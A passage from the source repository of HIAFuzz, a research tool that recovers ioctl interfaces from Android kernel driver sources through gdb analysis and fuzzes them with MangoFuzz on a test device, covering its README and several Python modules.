46 | :return: None 47 | """ 48 | print("[-] " + fmt % args) 49 | import ipdb;ipdb.set_trace() 50 | import sys;sys.exit(1) 51 | 52 | -------------------------------------------------------------------------------- /MangoFuzz/runner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import argparse 3 | import os 4 | from fuzzer.utils import * 5 | import time 6 | from fuzzer.engine import Engine 7 | from fuzzer.parse import Parser 8 | 9 | 10 | def main(): 11 | parser = argparse.ArgumentParser(description="MangoFuzz options") 12 | parser.add_argument('-f', type=str, help="Filename of the jpit, or driver directory containing jpits", required=True) 13 | parser.add_argument('-j', type=str, help="Juicer type. Default is TCP", default='tcp') 14 | parser.add_argument('-seed', type=int, help="Seed. Default will be time", default=None) 15 | parser.add_argument('-num', type=int, help="Number of tests to run (if limited). Default is to simply keep running.", default=None) 16 | parser.add_argument('-a', type=str, help="Address to send the data to. Default is localhost", default='localhost') 17 | parser.add_argument('-port', type=str, help="Port to send the data to. Default is 2022", default='2022') 18 | 19 | args = parser.parse_args() 20 | 21 | pits = args.f 22 | jtype = args.j 23 | num_tests = args.num 24 | addr = args.a 25 | port = args.port 26 | seed = args.seed 27 | 28 | mango = Engine(seed) 29 | parser = Parser(mango) 30 | 31 | if os.path.isdir(pits): 32 | pit_list = [] 33 | files = os.listdir(pits) 34 | 35 | for f in files: 36 | if list(f).count('_') >= 2 and ".swp" not in f: 37 | pit_list.append(pits+'/'+f) 38 | 39 | for pit in pit_list: 40 | parser.Parse(os.path.abspath(pit)) 41 | 42 | else: 43 | parser.Parse(pits) 44 | 45 | mango.run(jtype, num_tests, pit_name=None, name='dsa', address=addr, port=port) 46 | 47 | 48 | 49 | if __name__ == '__main__': 50 | main() 51 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # HIAFuzz 2 | Hybrid Interface Aware Fuzz for Android Kernel Drivers 3 | =================== 4 | This tool is for recovering ioctl interfaces in kernel drivers, which is used in kernel fuzzing. 5 | ### Tested on 6 | Ubuntu 16.04 LTS 7 | There are two main components of `HIAFuzz`: **Interface Recovery** and **Fuzzing Engine** 8 | 9 | ## 1. Interface Recovery 10 | The interface recovery mechanism is based on gdb analysis on kernel image vmlinux. 11 | 12 | ### 1.1 Setup 13 | This tool depends on pygdbmi, which is used for parsing gdb machine interface output with Python. 14 | ``` 15 | pip3 install pygdbmi 16 | ``` 17 | 18 | ### 1.2 Build the Kernel 19 | 20 | To run the Interface Recovery components on kernel drivers, we need to first compile the kernel with -g3 option. 21 | The following command can be used to replace all -g option to -g3. 22 | ``` 23 | for f in `find . -name Makefile`; do sed -i "s/-g /-g3 /g" $f;done 24 | for f in `find . -name Makefile`; do sed -i "s/-g$/-g3/g" $f; done 25 | ``` 26 | Then normal steps are taken to build the kernel. Ex: 27 | ``` 28 | make defconfig 29 | make -j8 O=out ARCH=arm64 30 | ``` 31 | After vmlinux builded, the debug information is in the .debug section. The option -j8 makes 8 threads working in parallel, and in few minutes the kernel will be build. 32 | 33 | ### 1.3 Running 34 | Use the following command to run this tool. 35 | ``` 36 | python3 gdbioctl.py -h 37 | usage: gdbioctl.py [-h] [-v VMLINUX] [-f DEVICE_IOCTL_FILE] 38 | 39 | optional arguments: 40 | -h, --help show this help message and exit 41 | -v VMLINUX Path of the vmlinux image. The recovered ioctls are 42 | stored in this folder. 43 | -f DEVICE_IOCTL_FILE The file that conations ioctl and corresponding device 44 | file names, like /dev/alarm alarm_ioctl. 45 | ``` 46 | For example, to analyze the vmlinux of kindle HDX 3rd, we need kindle7_device_ioctl.txt. Use the command 47 | ``` 48 | python3 gdbioctl.py -v /path/to/kindle/vmlinux -f /path/to/kindle7_device_ioctl.txt 49 | ``` 50 | After a few minutes the recovered interface are in the folder that -v option set. 51 | 52 | ## 2. Post Processing 53 | 54 | The recovered interfaces are described in text. They should be parsed in to structured xml document. Use the scripts in post_processing to do this job. 55 | ``` 56 | cd HIAFuzz/post_processing 57 | $ python run_all.py -h 58 | usage: run_all.py [-h] -f F -o O [-n {manual,auto,hybrid}] [-m M] 59 | 60 | run_all options 61 | 62 | optional arguments: 63 | -h, --help show this help message and exit 64 | -f F Filename of the ioctl analysis output OR the entire 65 | output directory created by the system 66 | -o O Output directory to store the results. If this 67 | directory does not exist it will be created 68 | -n {manual,auto,hybrid} 69 | Specify devname options. You can choose manual 70 | (specify every name manually), auto (skip anything 71 | that we don't identify a name for), or hybrid (if we 72 | detected a name, we use it, else we ask the user) 73 | -m M Enable multi-device output most ioctls only have one 74 | applicable device node, but some may have multiple. (0 75 | to disable) 76 | 77 | python run_all.py -f /path/to/ioctl_finder_out -o output -n auto -m 0 78 | 79 | ``` 80 | 81 | The structured xml documents are in output directory. 82 | 83 | ## 3. Fuzzing 84 | The fuzzing tool is Mango Fuzz from [difuze](https://github.com/ucsb-seclab/difuze). 85 | ### 3.1 Mango Fuzz 86 | MangoFuzz is a simple prototype fuzzer and is based off of Peach (specifically [MozPeach](https://github.com/MozillaSecurity/peach)). 87 | 88 | It's not a particularly sophisticated fuzzer but it does find bugs. 89 | It was also built to be easily expandable. 90 | There are 2 components to this fuzzer, the fuzz engine and the executor. 91 | The executor can be found [here](MangoFuzz/executor), and the fuzz engine can be found [here](MangoFuzz/fuzzer). 92 | 93 | ### 3.2 Executor 94 | The executor runs on the phone, listening for data that the fuzz engine will send to it. 95 | 96 | Simply compile it for your phones architecture, `adb push /data/local/tmp/` it on to the phone, and execute with the port you want it to listen on! 97 | 98 | 99 | ### 3.3 Fuzz Engine 100 | 101 | Note that before the fuzz engine can communicate with the phone, you'll need to use ADB to set up port forwarding e.g. `adb forward tcp:2022 tcp:2022` 102 | 103 | Interfacing with MangoFuzz is fairly simple. You'll want an `Engine` object and a `Parser` object, which you'll feed your engine into. 104 | From here, you parse jpits with your Parser, and then run the Engine. Easy! 105 | We've provided some simple run scripts to get you started. 106 | 107 | To run against specific drivers you can use `runner.py` on one of the ioctl folders in the output directory (created by our post processing scripts). 108 | 109 | e.g. `./runner.py -f honor8/out/chb -num 1000`. This tells MangoFuzz to run for 1000 iterations against all ioctl command value pairs pertaining to the `chb` ioctl/driver. 110 | 111 | If instead we want to run against an entire device (phone), you can use `dev_runner.py`. e.g. `./dev_runner.py -f honor8/out -num 100`. 112 | This will continue looping over the driver files, randomly switching between them for 100 iterations each. 113 | 114 | 115 | 116 | ## 4. Example 117 | 118 | Now, we will show an example from the point where you have kernel sources to the point of getting Interface Recovery results. 119 | Download and extract the kernel source of Huawei Mate 9 kernel from [MHA-NG_EMUI5.0_opensource.tar.gz](http://download-c1.huawei.com/download/downloadCenter?downloadId=95352&version=391424&siteCode=worldwide) from [Huawei Open Source Release Center](https://consumer.huawei.com/en/opensource/). 120 | Lets say you extracted the above file in a folder called: ~/Code_Opensource 121 | ### 4.1 Build the kernel 122 | Use the command to replace -g to -g3. 123 | 124 | ``` 125 | cd ~/Code_Opensource/kernel 126 | for f in `find . -name Makefile`; do sed -i "s/-g /-g3 /g" $f; done 127 | for f in `find . -name Makefile`; do sed -i "s/-g$/-g3/g" $f; done 128 | #export PATH=$PATH:$(android platform directory you download)/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9/bin 129 | export PATH=$PATH:/workspace/aosp/prebuilts/gcc/linux-x86/aarch64/aarch64-linux-android-4.9/bin/aarch64-linux-android-gcc 130 | export CROSS_COMPILE=aarch64-linux-android- 131 | mkdir ../out 132 | make ARCH=arm64 O=../out merge_hi3660_defconfig 133 | make ARCH=arm64 O=../out -j8 134 | ``` 135 | After a few minutes, the vmlinux of Mate 9 is generated in ../out/. 136 | 137 | ### 4.2 Running 138 | Use mate9_device_ioctl.txt provided by this project as input. 139 | ``` 140 | python3 gdbioctl.py -v ~/Code_Opensource/out/vmlinux -f ../DriversDevices/mate9_device_ioctl.txt 141 | ``` 142 | Tow folders are created in ~/Code_Opensource/out/ called ioctl_finder_out and ioctl_preprocessed_out. All interface recovered are located in ioctl_finder_out and related struct, union, type def and etc. are in ioctl_preprocessed_out. 143 | 144 | Use post processing scripts to generated structured document. 145 | 146 | ``` 147 | cd HIAFuzz/post_processing 148 | python run_all -f ~/Code_Opensource/out/ioctl_finder_out -o xml_output -n auto -m 0 149 | ``` 150 | 151 | The structured document are in HIAFuzz/post_processing/xml_output. Then: 152 | ``` 153 | cd ../MangoFuzz 154 | $ python runner.py -h 155 | usage: runner.py [-h] -f F [-j J] [-seed SEED] [-num NUM] [-a A] [-port PORT] 156 | 157 | MangoFuzz options 158 | 159 | optional arguments: 160 | -h, --help show this help message and exit 161 | -f F Filename of the jpit, or driver directory containing jpits 162 | -j J Juicer type. Default is TCP 163 | -seed SEED Seed. Default will be time 164 | -num NUM Number of tests to run (if limited). Default is to simply keep 165 | running. 166 | -a A Address to send the data to. Default is localhost 167 | -port PORT Port to send the data to. Default is 2022 168 | 169 | ``` 170 | You should run the executor in target device and run this script on host. 171 | 172 | 173 | 174 | 175 | 176 | 177 | -------------------------------------------------------------------------------- /cparser.py: -------------------------------------------------------------------------------- 1 | import os, re, chardet, traceback 2 | 3 | from mi import get_line_file_for_ioctl_function_from_gdb, get_struct_or_union_from_gdb 4 | from utils import base_types, is_contain_special_char 5 | 6 | ''' 7 | Given a source file, a function name, a decl line number, return command list and varibales. 8 | ''' 9 | def parser_source_codes(gdbmi, source_name, decl_line, function_name, depth=0, list_subprograms=[]): 10 | # print("Open CU's source file and find copy_from_user, get the first parameter and return its name.") 11 | try: 12 | rets = '' 13 | print("Parse %s in\n%s:%d" %( function_name, source_name, decl_line)) 14 | 15 | with open(source_name, "rb") as cf: 16 | result = chardet.detect(cf.read()) 17 | if result['encoding'] == 'GB2312': 18 | print("Fucking encoding GB2312") 19 | cmd = 'iconv -f gb2312 -t utf-8 %s -o %s' % (source_name, source_name) 20 | os.system(cmd) 21 | #cmd = 'dos2unix %s' % source_name 22 | #os.system(cmd) 23 | with open(source_name, 'r') as f: 24 | source_codes = f.readlines() 25 | 26 | DW_AT_decl_line = decl_line 27 | #print('Start line: %d' % DW_AT_decl_line) 28 | 29 | # Try to find lines of this subprogram, and find the copy_from_user function's first parameter. 30 | # Use a stack to store {}, if stack is empty, then the function is ended. 31 | braces_stack = 0 32 | cmds_args_list = [] 33 | last_macro = '' 34 | for line_num in range(DW_AT_decl_line -1, len(source_codes)): 35 | line = source_codes[line_num] 36 | # print(line) 37 | braces_stack += line.count('{') - line.count('}') 38 | if braces_stack == 0 and line_num - DW_AT_decl_line >5: 39 | print("End line: %d" % (line_num +1)) 40 | break 41 | if 'case' in line and ':' in line: 42 | try: 43 | command_macro = line[line.index('case') + 4: line.index(':')].strip() 44 | if '/' in command_macro: # May be a comment here like HIFI_MISC_IOCTL_ASYNCMSG /* comment here */ 45 | command_macro = command_macro[0: command_macro.index('/')].strip() 46 | if command_macro != '' and ' ' not in command_macro and len(command_macro ) >5: 47 | # Found Cmd:1090549505:START 48 | if last_macro != '': 49 | #print('Found Cmd:%s:END\n' % last_macro) 50 | rets += 'Found Cmd:%s:%s@%s:END\n' % (source_name, function_name, last_macro) 51 | last_macro = command_macro 52 | cmds_args_list.append(command_macro) 53 | #print('Found Cmd:%s:START' % command_macro) 54 | rets += 'Found Cmd:%s:%s@%s:START\n' % (source_name, function_name, command_macro) 55 | except: 56 | traceback.print_exc() 57 | pass 58 | 59 | elif 'copy_from_user' in line: 60 | 61 | if 'copy_from_user_preempt_disabled' in line: 62 | arg_start_index = line.index('copy_from_user_preempt_disabled')# + len('copy_from_user_preempt_disabled') 63 | copy_from_user_name = 'copy_from_user_preempt_disabled' 64 | else: 65 | arg_start_index = line.index('copy_from_user')# + len('copy_from_user') 66 | copy_from_user_name = 'copy_from_user' 67 | 68 | arg_end_index = arg_start_index 69 | # .*copy_from_user( word, word, word).* 70 | 71 | tail = line[arg_end_index:].strip().replace(' ', '') 72 | # print('tail=%s' % tail) 73 | try: 74 | first_arg = re.match(r'%s\((.*),' % copy_from_user_name, tail, re.I).group(1) 75 | #first_arg = re.match(r'copy_from_user\((.*),', tail, re.I).group(1) 76 | if ',' in first_arg: 77 | first_arg = first_arg[0:first_arg.find(',')] 78 | except: 79 | try: 80 | tail += source_codes[line_num +1].strip().replace(' ', '') 81 | first_arg = re.match(r'\((.*),(.*),(.*)\)', tail, re.I).group(1) 82 | except: 83 | # print("match %s error." % line) 84 | continue 85 | while first_arg[0] == '&' or first_arg[0] == '*': 86 | first_arg = first_arg[1:] 87 | # print("Found first arg") 88 | if first_arg != '' and ',' not in first_arg and '(' not in first_arg and ' ' not in first_arg and '<' not in first_arg: 89 | if '[' in first_arg: 90 | first_arg = first_arg[0:first_arg.index('[')] 91 | #print('STARTTYPE') 92 | #print(first_arg) 93 | #print('ENDTYPE') 94 | print('find variable %s in :' % first_arg) 95 | print('%s:%d' % (source_name, line_num+1)) 96 | rets += 'STARTTYPE\n%s#%s\nENDTYPE\n' % (function_name, first_arg) 97 | # Only keep the biggest struct, it will recover all the substruct. 98 | cmds_args_list.append(first_arg.split('->')[0].split('.')[0]) 99 | 100 | elif False and 'copy_to_user' in line: 101 | # copy_to_user will not cause problem. 102 | # No need to handle it. 103 | if 'copy_to_user_preempt_disabled' in line: 104 | arg_start_index = line.index('copy_to_user_preempt_disabled') + len('copy_to_user_preempt_disabled') 105 | else: 106 | arg_start_index = line.index('copy_to_user') + len('copy_to_user') 107 | arg_end_index = arg_start_index 108 | # .*copy_from_user( word, word, word).* 109 | tail = line[arg_end_index:].strip().replace(' ', '') 110 | # print('tail=%s' % tail) 111 | try: 112 | first_arg = re.match(r'\((.*),(.*),(.*)\)', tail, re.I).group(2) 113 | except: 114 | try: 115 | tail += source_codes[line_num +1].strip().replace(' ', '') 116 | first_arg = re.match(r'\((.*),(.*),(.*)\)', tail, re.I).group(2) 117 | except: 118 | # print("match %s error." % line) 119 | continue 120 | while first_arg[0] == '&' or first_arg[0] == '*': 121 | first_arg = first_arg[1:] 122 | 123 | if first_arg != '' and ',' not in first_arg and '(' not in first_arg and ' ' not in first_arg and '<' not in first_arg: 124 | if '[' in first_arg: 125 | first_arg = first_arg[0:first_arg.index('[')] 126 | #print('STARTTYPE') 127 | print('find variable %s in :' % first_arg) 128 | print('%s:%d' % (source_name, line_num+1)) 129 | #print('ENDTYPE') 130 | rets += 'STARTTYPE\n%s#%s\nENDTYPE\n' % (function_name, first_arg) 131 | # Only keep the biggest struct, it will recover all the substruct. 132 | cmds_args_list.append(first_arg.split('->')[0].split('.')[0]) 133 | 134 | elif '(' in line: 135 | # head = line[0:line.index('(')] 136 | start = 0 137 | subfuncs = ['if', 'for', 'while', 'sizeof', 'copy_from_user', 'copy_to_user', 'printk', 'mutex_lock', 'mutex_unlock', 'switch'] 138 | if not likely_ioctl(function_name, line, depth): 139 | continue 140 | 141 | for i in range(line.count('(')): 142 | # First get the function name. 143 | func = '' 144 | start = line.index('(', start) 145 | head = line[0:start].strip().replace('\t', ' ') 146 | if ' ' in head: 147 | func = head[head.rfind(' ') +1:] 148 | else: 149 | func = head 150 | print('call function \'%s\' at' % func) 151 | print('%s:%d' % (source_name, line_num + 1)) 152 | # if len(func) > 0 and func not in called_fucnts_list and func not in subfuncs: 153 | # called_fucnts_list.append(func) 154 | 155 | if func not in list_subprograms and func not in subfuncs: # Some function we need not to check 156 | list_subprograms.append(func) 157 | #fDIE = find_subprogram_by_name(CU, func) 158 | decl_line, source_file = get_line_file_for_ioctl_function_from_gdb(gdbmi, func) 159 | #Some function may be inlined, and can not find definition from gdb. 160 | #Use ctags to get the definition line. 161 | 162 | print('function \'%s\' decl at' % func) 163 | print('%s:%d' % (source_file, decl_line + 1)) 164 | if source_file != '': 165 | child_rets = handle_subprogram(gdbmi, source_name=source_file, decl_line=decl_line, function_name = func, depth=depth + 1, list_subprograms=list_subprograms) 166 | if child_rets is not None: 167 | rets += child_rets 168 | if last_macro != '': 169 | #print('Found Cmd:%s:END\n' % last_macro) 170 | rets += 'Found Cmd:%s:%s@%s:END\n' %(source_name, function_name, last_macro) 171 | return rets 172 | except: 173 | traceback.print_exc() 174 | return None 175 | 176 | def likely_ioctl(fatherf, line, depth): 177 | return True 178 | keywords = ['ioctl', 'cmd', 'do', 'route', 'arg', 'usr'] 179 | if depth == 0: 180 | keywords += fatherf.split('_') 181 | 182 | for kw in keywords: 183 | if kw in line: 184 | return True 185 | return False 186 | ''' 187 | Given a source file, a function name, a decl line number, return command list and varibales. 188 | ''' 189 | def handle_subprogram(gdbmi, source_name, decl_line, function_name, depth=0, list_subprograms=[]): 190 | #Firstly handle every subprogram, use objdump to get the called subprogram's name, 191 | #Then find the cooresponding DIE and handle it. 192 | if depth > 2: 193 | print('Call %s reach max depth' % function_name) 194 | return None 195 | total_cmds_vars = '' 196 | 197 | #print('handling subprogram:%s' % function_name) 198 | if True: #is_copy_to_from_user_occur: 199 | #print("Found copy_from_user used.") 200 | list_subprograms.append(function_name) 201 | cmds_vars = parser_source_codes(gdbmi, source_name, decl_line, function_name, depth, list_subprograms) 202 | if cmds_vars is not None: 203 | total_cmds_vars += cmds_vars 204 | else: 205 | pass 206 | #Only the first level of unlocked_ioctl will handle BEGINTYPE ENDTYPE. 207 | return total_cmds_vars 208 | 209 | def get_variable_type(gdbmi, function_name, variable_name): 210 | #print('Try to determine the type of %s:%s ' % (function_name, variable_name)) 211 | decl_line, sourcefile = get_line_file_for_ioctl_function_from_gdb(gdbmi, function_name) 212 | #print('%s:%s' % (sourcefile, decl_line)) 213 | line_count = 0 214 | if os.path.exists(sourcefile): 215 | f = open(sourcefile,'r') 216 | lines = f.readlines() 217 | f.close() 218 | bracket_count = 0 219 | for line in lines[decl_line-1:]: 220 | line_count += 1 221 | 222 | bracket_count += line.count('{') 223 | bracket_count -= line.count('}') 224 | 225 | if bracket_count == 0 and line_count>5: 226 | break 227 | statements = line.split(';') 228 | for statement in statements: 229 | statement = statement.strip().replace('*', ' * ').replace('[', ' [ ').replace('(', ' ( ') 230 | tokens = statement.split(' ') 231 | if variable_name in tokens: 232 | #print(statements) 233 | #print('find statement %s' % statement) 234 | type_statement = ' '.join(tokens[0:tokens.index(variable_name)]) 235 | 236 | if '*' in type_statement: 237 | type_statement = type_statement[0:statement.index('*')].strip() 238 | 239 | if not is_contain_special_char(type_statement): 240 | #print('find type_statement \'%s\'' % type_statement) 241 | return type_statement 242 | 243 | #print('%s:%s' % (sourcefile, decl_line+line_count)) 244 | 245 | return '' 246 | -------------------------------------------------------------------------------- /gdbioctl.py: -------------------------------------------------------------------------------- 1 | #from elftools.elf.elffile import ELFFile 2 | import os, re, time 3 | import argparse 4 | from utils import base_types 5 | 6 | from cparser import handle_subprogram, get_variable_type 7 | from pygdbmi.gdbcontroller import GdbController 8 | from mi import get_line_file_for_ioctl_function_from_gdb, get_struct_or_union_from_gdb, get_macro_from_gdb, base_types, gdb_sizeof_type 9 | gdbmi = None 10 | DEBUG = False 11 | #DEBUG = True 12 | def get_ccodes_from_dict(recovered_struct_dict={}): 13 | 14 | keys = list(recovered_struct_dict.keys()) 15 | #ordered_keys = list(keys) 16 | print(keys) 17 | print(recovered_struct_dict) 18 | def compare_key(key1, key2, dicts): 19 | if key1 == key2: 20 | return 0 21 | if key1 in dicts[key2]: # key1 < key2 22 | return -1 23 | if key2 in dicts[key1]: # key1 > key2 24 | return 1 25 | return 0 26 | 27 | #Need to use selection sort. 28 | def select_smallest_key(dicts = {}): 29 | # To ensure the select one is the smallest, it should be compared all the rest element. 30 | keys = dicts.keys() 31 | 32 | for potentail_key in keys: 33 | is_this_smallest = True 34 | for rest_key in keys: 35 | if compare_key(potentail_key, rest_key, dicts) > 0: 36 | is_this_smallest = False 37 | break 38 | if is_this_smallest: 39 | return potentail_key 40 | 41 | ordered_keys = [] 42 | recovered_struct_dict_copy = recovered_struct_dict.copy() 43 | while len(recovered_struct_dict_copy) > 0: 44 | smallest_key = select_smallest_key(recovered_struct_dict_copy) 45 | ordered_keys.append(smallest_key) 46 | recovered_struct_dict_copy.pop(smallest_key) 47 | 48 | ccodes = '' 49 | print(ordered_keys) 50 | 51 | for key in ordered_keys: 52 | #TODO: Some complex struct may contains anonymous struct like struct {...} ptr; 53 | #TODO: Need to implement a gdb plugin to print struct recoursely. 54 | #But now just replace struct {...} to ignore it. 55 | if 'struct {...}' in recovered_struct_dict[key]: 56 | recovered_struct_dict[key] = recovered_struct_dict[key].replace('struct {...}', 'long int anon[4]'); 57 | ccodes += recovered_struct_dict[key] + '\n' 58 | return ccodes 59 | 60 | def handle_BEGINTYPE_ENDTYPE(gdbmi, rets): 61 | print('Before handle_BEGINTYPE_ENDTYPE') 62 | print(rets) 63 | intype = False 64 | lines = rets.split('\n') 65 | ccodes = '' 66 | handled_type_list = [] 67 | recovered_struct_dict = {} 68 | for i in range(len(lines)): 69 | line = lines[i] 70 | if line == 'STARTTYPE': 71 | intype = True 72 | continue 73 | elif line == 'ENDTYPE': 74 | intype = False 75 | continue 76 | 77 | if intype: 78 | if '#' in line: 79 | function_name, variable_name = line.strip().split('#') 80 | type_name = get_variable_type(gdbmi, function_name, variable_name) 81 | if 'struct' in type_name: 82 | lines[i] = '%%%s = {}' % type_name.replace('struct ', 'struct.') 83 | elif 'union' in type_name: 84 | lines[i] = '%%%s = {}' % type_name.replace('union ', 'union.') 85 | else: 86 | sizeoftype = gdb_sizeof_type(gdbmi, type_name) 87 | lines[i] = 'i%d' % (sizeoftype * 8) 88 | 89 | if type_name in base_types: 90 | print('%s is base type %s' % (variable_name, type_name)) 91 | else: 92 | if type_name not in recovered_struct_dict.keys(): 93 | sub_recovered_struct_dict = get_struct_or_union_from_gdb(gdbmi, type_name) 94 | for key, value in sub_recovered_struct_dict.items(): 95 | recovered_struct_dict[key] = value 96 | else: 97 | print('intype but no #') 98 | print(line) 99 | 100 | ''' 101 | if '.' in varname or '->' in varname: 102 | if '.' in varname: 103 | varnames = varname.split('.') 104 | elif '->' in varname: 105 | varnames = varname.split('->') 106 | print('.->'.join(varnames)) 107 | ''' 108 | 109 | # remove duplicated structs. 110 | ccodes = get_ccodes_from_dict(recovered_struct_dict) 111 | structs_list = [] 112 | backup_ccodes = ccodes 113 | print(ccodes) 114 | return '\n'.join(lines), ccodes 115 | 116 | def assign_macros(gdbmi, cmdstypes): 117 | #Found Cmd:%s:END 118 | #print(cmdstypes) 119 | 120 | target_macro_list = [] 121 | cmdstypes_list = cmdstypes.split('\n') 122 | for cmd in cmdstypes_list: 123 | if 'Found Cmd' in cmd and 'START' in cmd: 124 | print(cmd) 125 | if cmd.count(':') == 3: 126 | acmd = cmd[cmd.index(':')+1:cmd.rindex(':')] 127 | 128 | if acmd not in target_macro_list and not acmd.isdigit(): 129 | target_macro_list.append(acmd) 130 | 131 | if target_macro_list == []: 132 | return cmdstypes 133 | print(target_macro_list) 134 | #gdbinit = 'file %s\n' % vmlinux 135 | macro_value = {} 136 | for func_macro in target_macro_list: 137 | func, macro = func_macro.split('@') 138 | macro_value[func_macro] = get_macro_from_gdb(gdbmi, func, macro) 139 | print(macro_value) 140 | 141 | for i in range(len(cmdstypes_list)): 142 | cmd = cmdstypes_list[i] 143 | if 'Found Cmd' in cmd: 144 | #print(cmd) 145 | if cmd.count(':') == 3: 146 | acmd = cmd[cmd.index(':') + 1:cmd.rindex(':')] 147 | if acmd in macro_value.keys(): 148 | cmdstypes_list[i] = cmd.replace(acmd, macro_value[acmd]) 149 | cmdstypes = '\n'.join(cmdstypes_list) 150 | #print(cmdstypes) 151 | return cmdstypes 152 | 153 | def main(): 154 | parser = argparse.ArgumentParser() 155 | # Ex: python3 gdbioctl.py -v /workspace/difuze/AndroidKernels/kindle_fire_7/WORKSPACE_DIR/out2/vmlinux -f /workspace/difuze/AndroidKernels/kindle_fire_7/WORKSPACE_DIR/out/kindle7_device_ioctl.txt 156 | # Ex: python3 gdbioctl.py -v /workspace/difuze/AndroidKernels/kindle_fire_7/WORKSPACE_DIR/out2/vmlinux -f /workspace/difuze/AndroidKernels/kindle_fire_7/WORKSPACE_DIR/out/kindle7_device_ioctl.txt 157 | #parser.add_argument('-o', action='store', dest='ioctl_out', help='Destination directory where all the generated interface should be stored.') 158 | parser.add_argument('-v', action='store', dest='vmlinux', help='Path of the vmlinux image. The recovered ioctls are stored in this folder.') 159 | parser.add_argument('-f', action='store', dest='device_ioctl_file', help='The file that conations ioctl and corresponding device file names, Ex: /dev/alarm alarm_ioctl.') 160 | olddir = os.getcwd() 161 | 162 | parsed_args = parser.parse_args() 163 | print('%s:%s' % (parsed_args.device_ioctl_file, 5)) 164 | #Before make vmlinux, these steps should be taken. 165 | ''' 166 | for f in `find . -name Makefile`; do sed -i "s/-g /-g3 /g" $f; done 167 | for f in `find . -name Makefile`; do sed -i "s/-g$/-g3/g" $f; done 168 | With make, add this CONFIG_DEBUG_SECTION_MISMATCH=y flag to xxxdeconfig. 169 | ''' 170 | #Add flag: -fno-inline-functions-called-once 171 | 172 | os.chdir(os.path.dirname(parsed_args.vmlinux)) 173 | outdir = os.path.join(os.path.dirname(parsed_args.vmlinux), 'ioctl_finder_out') 174 | outdir2 = os.path.join(os.path.dirname(parsed_args.vmlinux), 'ioctl_preprocessed_out') 175 | 176 | if not os.path.exists(outdir): 177 | os.mkdir(outdir) 178 | if not os.path.exists(outdir2): 179 | os.mkdir(outdir2) 180 | 181 | ioctl_set = [] 182 | #ff = open('/workspace/difuze/AndroidKernels/huawei/mate9/fuben/Code_Opensource/out/ioctls', 'r') 183 | with open(parsed_args.device_ioctl_file, 'r') as ff: 184 | ioctl_set = [x.strip() for x in ff.readlines()] 185 | 186 | device_dict = {} 187 | ioctl_list = [] 188 | if ' ' in ioctl_set[0]:# Contains devname 189 | for device_ioctl in ioctl_set: 190 | device_name, ioctl_name = device_ioctl.split(' ') 191 | device_dict[ioctl_name] = device_name 192 | ioctl_list.append(ioctl_name) 193 | 194 | ioctl_set = set(ioctl_list) 195 | print(device_dict) 196 | 197 | if DEBUG: 198 | ioctl_set.clear() 199 | ioctl_set.append('main') 200 | print(ioctl_set) 201 | 202 | #for aioctl in ioctl_set: 203 | for aioctl, device_name in device_dict.items(): 204 | print('handling %s' % aioctl) 205 | ioctl_set.remove(aioctl) 206 | gdbmi = GdbController() 207 | response = gdbmi.write('file %s' % parsed_args.vmlinux) 208 | sourcefile_line_dict = get_line_file_for_ioctl_function_from_gdb(gdbmi, aioctl, allow_multi= True) 209 | item_count = 0 210 | for sourcefile, line in sourcefile_line_dict.items(): 211 | if sourcefile == '': 212 | continue 213 | #if sourcefile[0] != '/': 214 | # sourcefile = '/workspace/difuze/dwarf/test/'+sourcefile 215 | print('%s:%d' %(sourcefile, line)) 216 | cmds_vars = handle_subprogram(gdbmi, source_name=sourcefile, decl_line=line, function_name=aioctl, depth=0, 217 | list_subprograms=[]) 218 | #print(cmds_vars) 219 | cmdstypes, restruct = handle_BEGINTYPE_ENDTYPE(gdbmi, cmds_vars) 220 | 221 | if restruct is not None: 222 | if item_count == 0: 223 | processed_filename = os.path.join(outdir2, aioctl + '.processed') 224 | txt_filename = os.path.join(outdir, aioctl + '.txt') 225 | else: 226 | processed_filename = os.path.join(outdir2, aioctl + str(item_count) + '.processed') 227 | txt_filename = os.path.join(outdir, aioctl + str(item_count) + '.txt') 228 | 229 | with open(processed_filename,'w') as f: 230 | f.write(restruct) 231 | print(processed_filename+':1') 232 | if cmdstypes is not None: 233 | with open(txt_filename, 'w') as f: 234 | f.write('O yeah...\n[+] Provided Function Name: %s\n' % aioctl) 235 | if device_dict == {}: 236 | f.write('Device Name: tododevname\n') 237 | else: 238 | f.write('Device Name: %s\n' % device_dict[aioctl]) 239 | f.write(assign_macros(gdbmi, cmdstypes)) 240 | f.write('Compl Preprocessed file:%s\n' % processed_filename) 241 | f.write('ALL PREPROCESSED FILES:\n') 242 | print(txt_filename + ':10') 243 | item_count += 1 244 | 245 | gdbmi.exit() 246 | time.sleep(2) 247 | 248 | if len(ioctl_set) == 0: 249 | print("All ioctl functions are found.") 250 | else: 251 | print("%d ioctl functions are not found." % len(ioctl_set)) 252 | print(ioctl_set) 253 | os.chdir(olddir) 254 | print('Recovered interfaces are sotred in:\n%s\n%s' % (outdir, outdir2)) 255 | print("Goodbye!") 256 | 257 | if __name__ == "__main__": 258 | main() 259 | -------------------------------------------------------------------------------- /mi.py: -------------------------------------------------------------------------------- 1 | ''' 2 | This file provides function relate to c source code analyze. 3 | get_struct_or_union_from_gdb 4 | ''' 5 | import re, time, os 6 | from utils import base_types, is_contain_special_char 7 | import subprocess 8 | 9 | kernel_root = '' 10 | 11 | ''' 12 | Given a struct name, return the definition of the struct. 13 | ''' 14 | 15 | def get_struct_or_union_from_gdb(gdbmi, struct_name): 16 | deps = [struct_name] 17 | all_struct = [struct_name] 18 | ccodes = {} 19 | all_struct += base_types 20 | while len(deps) > 0: 21 | sname = deps.pop().strip() 22 | if sname == '': 23 | continue 24 | #print('sname=%s' % sname) 25 | ccodes[sname] = '' 26 | ptype_cmd = 'ptype %s' % sname 27 | #print(ptype_cmd) 28 | response = gdbmi.write(ptype_cmd, timeout_sec=20) 29 | #print(response) 30 | is_typedef_struct = False 31 | #print(response) 32 | for message in response: 33 | if message['stream'] == 'stdout' and message['payload'] is not None: 34 | if type(message['payload']) != str: 35 | #print(type(message['payload'])) 36 | print('Not str') 37 | continue 38 | 39 | if message['payload'].replace('\\n', '') == ptype_cmd: 40 | continue 41 | if 'A syntax error in expression' in message['payload']: 42 | break 43 | if '\\\\\\\\\\' in message['payload']: 44 | break 45 | 46 | line = message['payload'].replace('\\n', '\n').replace('type = ', '') 47 | # print(line) 48 | 49 | if 'struct' in sname or 'union' in sname: # Check depended types. 50 | ccodes[sname] += line 51 | if ':' in line: 52 | # 